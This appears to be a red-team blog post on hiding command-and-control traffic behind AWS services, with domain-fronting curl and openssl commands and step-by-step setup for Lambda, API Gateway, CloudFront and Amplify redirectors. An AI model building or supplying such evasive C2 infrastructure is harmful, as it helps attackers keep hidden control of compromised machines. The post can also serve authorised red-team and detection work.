Recently I’ve been looking into options for abusing AWS services to forward HTTP Command and Control (C2) traffic. This post will talk about a number of approaches for this I found discussed on the Internet as well as a few options that I identified myself.
For those not familiar with how most modern C2 systems work, an overview of their operation might be helpful. Skip ahead a paragraph if you are already familiar with the way C2 systems are designed.
A Command and Control system provides an interface by which commands can be run on already compromised computers in order for attackers to achieve their goals. Specific terms vary, but C2 architecture normally consists of implants that run on compromised devices and run commands, interfaces that attackers can use to issue commands to be run on compromised devices, and servers that coordinate communications between the two. The C2 server normally sits in a location reachable from the Internet, so victim systems with the C2 implant installed can communicate back to the server to ask for instructions. Depending on the C2 software in question, there will be one or more protocols supported for this purpose. The protocols chosen are repurposed, in that they were originally designed and used for some other benign purpose. This repurposing is done deliberitely in order to make the C2 implant communications blend in to normal network traffic. The most commonly supported protocol for implant to server communication in modern C2 systems is HTTP/S.
The use of HTTP/S by C2 is not the only way this protocol is abused for malicious activity, so defenders are paying attention. One approach to try and identify abuse of the protocol is to check the “reputation” of HTTP/S traffic destinations using a source like this (other sources are available). By making use of AWS services that can proxy HTTP traffic, the operator of a C2 server can take advantage of the comparitively “good” reputation of the URLs associated with those AWS services to try and avoid detection. So, my question was, what AWS services can be used in this manner?
I started off this exercise by looking for existing writeups on the topic. I considered out of scope anything that required custom C2 implant communications (e.g. External C2). I wanted forwarding of plain old HTTP/S to give me the widest possible range of options in C2 servers that could be put behind this without requiring code changes.
After a few hours of research, I found the following:
Something that you will see repeated endlessly if you search on this topic is that you can use the CloudFront Content Delivery Network (CDN) to perform domain fronting for C2 services.
Domain fronting is a technique that attempts to hide the true destination of a HTTP request or redirect traffic to possibly restricted locations by abusing the HTTP routing capabilities of CDNs or certain other complex network environments. For version 1.1 of the protocol, HTTP involves a TCP connection being made to a destination server on a given IP address (normally associated with a domain name) and port, with additional TLS/SSL encryption support for the connection in HTTPS. Over this connection a structured plain text message is sent that requests a given resource and references a server in the Host
header. Under normal circumstances the domain name associated with the TCP connection and the Host
header in the HTTP message match. In domain fronting, the destination for the TCP connection domain name is set to a site that you want to appear to be visiting, and the Host
header in the HTTP request is set to the location you actually want to visit. Both locations must be served by the same CDN.
The following curl command demonstrates in the simplest possible way how the approach is performed in suited environments. In the example, http://fakesite.cloudfront.net/
is what you want to appear to be visiting, and http://actualsite.cloudfront.net
is where you actually want to go:
curl -H 'Host: actualsite.cloudfront.net' http://fakesite.cloudfront.net/
In this example, any DNS requests resolved on the client site are resolving the “fake” address, and packet captures will show the TCP traffic going to that fake systems IP address. If HTTPS is supported, and you use a https://
URL, the actual destination you are visiting located in the HTTP Host
header will also be hidden in the encrypted tunnel.
While this is a great way of hiding C2 traffic, due to a widespread practice of domain fronting being used to evade censorship restrictions, various CDNs did crack down on the approach a few years ago. Some changes were rolled back in some cases, but as at the time of this writing this simple approach to domain fronting does not work in CloudFront for HTTPS. If the DNS hostname that you connect to does not match any of the certificates you have associated with your CloudFront distribution, you will get the following error:
The distribution does not match the certificate for which the HTTPS connection was established with.
This applies only to HTTPS - HTTP still works using the approach shown in the example above. However, given the fact that HTTP has the Host
header value exposed in the clear in network traffic this leaves something to be desired when the purpose is hiding where you’re going. Depending on the capability of inspection devices, it might be good enough for certain purposes however.
It is possible to make HTTPS domain fronting work on CloudFront via use of Server Name Indication (SNI) to specify a Server Name value during the TLS negotiation that matches a certificate in your Cloudfront distribution. In other words, you TCP connect via HTTPS to a fake site on the CDN and set the SNI servername for the TLS negotation AND the HTTP Host
to your actual intended host.
Heres how this connection looks using openssl.
openssl s_client -quiet -connect fakesite.cloudfront.net:443 -servername actualsite.cloudfront.net < request.txt
depth=2 C = US, O = Amazon, CN = Amazon Root CA 1
verify return:1
depth=1 C = US, O = Amazon, CN = Amazon RSA 2048 M01
verify return:1
depth=0 CN = *.cloudfront.net
verify return:1
Where file request.txt
contains something like the following:
GET / HTTP/1.1
Host: actualsite.cloudfront.net
Unfortunately, I’m not aware of any C2 implant that supports specifying the TLS servername in a manner similar to what is shown above, so C2 HTTPS domain fronting using CloudFront is not a viable approach until this time. However, this does not mean that CloudFront is completely unusable for C2. As already mentioned, you can do domain fronting via HTTP. Its also possible to access the distribution via HTTPS using the <name>.cloudfront.net
name that is created randomly for you when you setup your distribution. This domain does have a good trust profile in some URL categorisation databases.
With that diversion out of the way, lets look at the complete list of options I identified for forwarding HTTP traffic using AWS services.
Heres the list, including the afore mentioned approaches I found discussed elsewhere on the Internet, and a few more I identified myself:
*.amplifyapp.com
domain.Out of these, my favorite approach is the API Gateway proxying method. In a coming section, I’ll talk at a high level about how to implement each of these approaches, as well as some of the more relevant details for C2 forwarding that apply. First however, given that its referenced in two of the above options I want to go over the relevant differences between the two API Gateway types for C2 forwarding.
The API gateway offers two main types of API - REST and HTTP. The API documentation provides a lot of information on choosing between these two types of gateway starting here, but from our perspective of fronting C2 traffic the important points are as follows:
https://<random_10_chr_str>.execute-api.<region>.amazonaws.com/<path>
.stage
be included at the start of the URI path. For example a REST API entrypoint would look like this https://<rest-api>.execute-api.<region>.amazonaws.com/stage_name/
, whereas a HTTP one could look like this https://<http-api>.execute-api.<region>.amazonaws.com/
. Some C2 servers can deal with additional path information in the URL without a problem although this does make certain proxying configurations more complex for REST types.Due to last point alone my preference is to use HTTP API gateway types instead of REST ones for C2 forwarding, whether via Lambda or direct proxying, and this is the implementation approach I recommend below in cases where the API gateway is used. This also means that my suggested method for implementing the API Gateway<->Lambda forwarder is different than the Serverless approach discussed in Adam’s post. I think this difference in approach here is largely due to the rapid increase in functionality of AWS services over time - I don’t believe the HTTP API Gateway type was available back when Adam originally wrote his post.
The following are instructions on how to implement each of the afore mentioned C2 forwarding approaches and a summary of some of their relevant distinguishing features. The assumption I have made with the instructions is that the destination C2 server sits within the same AWS account as the AWS forwarding service being configured, and that you are following a minimal access permission model in your account. I havent made any specific assumptions about the rest of the C2 design in your network, although my design involved an additional reverse HTTP proxy that handled all implant HTTP traffic destined for the C2 box. In cases where I refer to en EC2 instance receiving HTTP/S from the AWS service forwarder - this was the box being referred to. If theres interest, I can do a seperate post on this design, but for the purpose of this post Ive tried to keep the instructions generic.
The instructions are fairly bare bones, listing the minimal configuration settings you need to set to make the service functional, and assume you have fairly decent knowldge of how AWS networking, IAM and security groups work. You might need to refer to the AWS documentation for specific services to find where a particular referenced setting is set. These are the manual click-ops steps, but if you want to rapidly deploy and tear down your infrastructure you will obviously want to implement these steps in an Infrastructure as Code format.
Summary
https://<random_32_char_value>.lambda-url.<aws_region>.on.aws
Computer and Internet Info
, Low Risk
*.lambda-url.<aws_region>.on.aws
Setup
Scott’s blog post and associated Red Lambda Github repository provide some instructions and CloudFormation code to implement a Lambda/Function URL forwarder and C2 system, but if your design is different its helpful to know know to do the Function URL and Lambda setup manually.
Take the Lambda code from Scotts repository. Depending on when you follow these instructions, you can also use my fork instead, thats awaiting PR acceptance into Scott’s repository and fixes an issue with proper forwarding of binary responses from the backend C2 server.
Create a new Lambda using the Python 3.7 runtime (later versions will not work due to issues with the Python requests module).
The handler for the Lambda should be set to lambda_function.redirector
assuming a code filename of lambda_function.py
.
Set an environment variable of TEAMSERVER
to point to the private IP address or name of the HTTPS capable service you want to redirect to.
Associate the appropriate VPC and subnet with the Lambda (these should match the VPC and subnet of the destination EC2 instance) and create a dedicated security group for the Lambda.
Add a security rule to the Security Group for the destination EC2 instance that allows HTTPS from the security group associated with the Lambda.
When creating the Lambda, choose to associate a Function URL with it.
The Lambda execution role should be a custom IAM role with the AWSLambdaExecute
managed policy AND the following custom policy attached.
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "LambdaRedir",
"Effect": "Allow",
"Action": [
"ec2:CreateNetworkInterface",
"ec2:DeleteNetworkInterface",
"ec2:DescribeInstances",
"ec2:AttachNetworkInterface",
"ec2:DescribeNetworkInterfaces"
],
"Resource": "*"
}
]
}
An auto generated Function URL address will be provided in the console once configuration is complete.
Summary
https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/
Computer and Internet Info
, Low Risk
Setup
As mentioned in the API Gateway section above, I prefer using the HTTP API Gateway type as opposed to the REST type, so my setup approach is different to the way that API Gateway/Lambda forwarding was setup in Adam’s blog post.
The setup is pretty straightforward.
Setup a forwarder Lambda as described in the section above. This Lambda code works with both Function URL and API Gateway triggers. Given you are using API Gateway forwarding you can skip the step where you enable a Function URL if you like or leave it if you want both entrypoints enabled.
Create a HTTP
API Gateway instance.
Create a /{proxy+}
resource for the ANY
method.
Add an AWS Lambda integration, pick the region where your Lambda resides and the Lambda name. There will be an option Grant API Gateway permission to invoke your Lambda function
which you can leave selected. No authorizer is required.
Create a $default
stage and enable automatic deployment.
The invoke URL will be provided on the summary page for the gateway.
Summary
https://<13_character_random_value>.cloudfront.net/
Content Delivery Networks
, Low Risk
for *cloudfront.net URLS, or domain dependant for custom domainsSetup
There are dozens of resources on the Internet that describe how to use CloudFront as a forwarder for C2, so I wont go into detail on how to configure it here, you can check one of the many other resources for detail instructions. Amongst those linked above I also used this as a reference when setting up my POC.
I will provide some general notes and tips I had about the creation process.
Using a CloudFront distribution for C2 fronting requires:
Each of the different load balancer options has different characteristics that might influence the right option to choose depending on the environment.
To setup a classic load balancer add one in the same VPC as the destination EC2 instance, create a dedicated security group and add a rule to allow traffic to port 80 from the managed prefix list com.amazonaws.global.cloudfront.origin-facing
- this allows only traffic from the CloudFront servers to reach the load balancer. The id of the list can be looked up in the Managed prefix lists section of the VPC console in order to add it to the security group - this was pl-b8a742d1
at the time this post was written. The origin in the CloudFront distribution should then be set to forward traffic using HTTP.
If access via a custom domain is required, the domain needs to have a SSL certificate added with all desired names (e.g. domain.com, www.domain.com)for the domain in the us-east-1 region (N.Virginia) region. That certificate can then be selected in the Custom SSL Certificate section of the Distributions settings. The names in the certificate should include all of the Alternate Domain Name (CNAME) entries in the distribution. A link to the appropriate section of the AWS console to create the certificate is shown in the wizard for creating a CloudFront distribution.
Other than the two previously mentioned options, the other important values to set in the distribution relate to forwarding behavior - specifically the caching and allowable HTTP methods. Allow all HTTP methods and use Legacy cache settings selecting All for Headers, Query strings and Cookies.
The distribution domain name will be provided in the settings.
Summary
https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/
Computer and Internet Info
, Low Risk
Setup
The API Gateway direct proxying approach allows you to forward to an Internet accessible URI or a private resource. For cases where the C2 sits in the same AWS account as the forwarding service, a private resource is preferrable as it does not require that you expose your C2 service directly on the Internet and you can save on AWS network traffic transit costs. For a private resource you can forward to a load balancer or a Cloud Map service that points to one or more services running on cloud resources (e.g. web servers on EC2 instances) that you want to receive your forwarded traffic. I chose to use a Cloud Map service pointing to port 80 on an EC2 instance as it was more cost effective than a load balancer. Seeing as the forwarded traffic is internal to my AWS account I was forwarding it as HTTP not HTTPS.
The following instructions explain how to setup proxying to a Cloud Map service that will point to a target EC2 instance. Take note of the target EC2 instances private IP address, VPC and subnet before starting as these details will be required:
Setup a AWS Cloud Map namespace supporting API calls and DNS queries in VPCs
. You can put it in the same VPC as your destination EC2 instance.
Create a cloud map API and DNS
service within the namespace crated in step 1.
Create a service instance within the service created in step 2. This service instance should point to the private IP address of the target EC2 instance and TCP port 80.
Create a security group in the VPC/subnet where the target EC2 instance resides that can be used to associate with a VPC link. This will be used to allow the VPC link and hence the API gateway to talk TO the destination EC2 instance.
Add a rule to the target EC2 instances security group that allows connections FROM the security group created in step 4 to the same service port configured in the Cloud Map service instance (e.g. 80/HTTP).
Create an API Gateway VPC link for HTTP APIs to provide a path for the API Gateway to communicate with the VPC and subnet where the destination EC2 instance resides.
Associate the VPC link created in step 6 with the VPC and subnet that the target EC2 instance resides in and the security group created in step 4.
Create a API Gateway HTTP
API instance, without creating an initial integration. Keep the default $default
deployment stage with automated deployment.
In the new API gateway, create a route with pattern /{proxy+}
resource for the ANY
method.
In the new API gateway, create a private resource integration that points to the Cloud Map service created in step 2. Associate the VPC link created in step 7 with the integration.
Attach the integration created in step 9 to the route created in step 8.
The invoke URL will be shown in the stage configuration page.
Summary
https://<stage_name>.<14_character_random_value>.amplifyapp.com/
Business and Economy
, Low Risk
Setup
The AWS Amplify fronting method requires an Internet accessible URI to forward traffic to. When you have this you can create an Amplify application with an empty code deployment and then configure rewriting to redirect all requests to the application to your desired site. The site is delivered via CloudFront and visitors to the site wont be able to tell they are being redirected. Setup like so:
python -c 'import shutil; shutil.make_archive("test1", "zip", "/tmp/test")'
/<*>
to target https://web.site/<*>
(or your custom destination) of type 200 (Rewrite)
Once configured the URL for the app will be available in a few locations throughout the Amplify interface.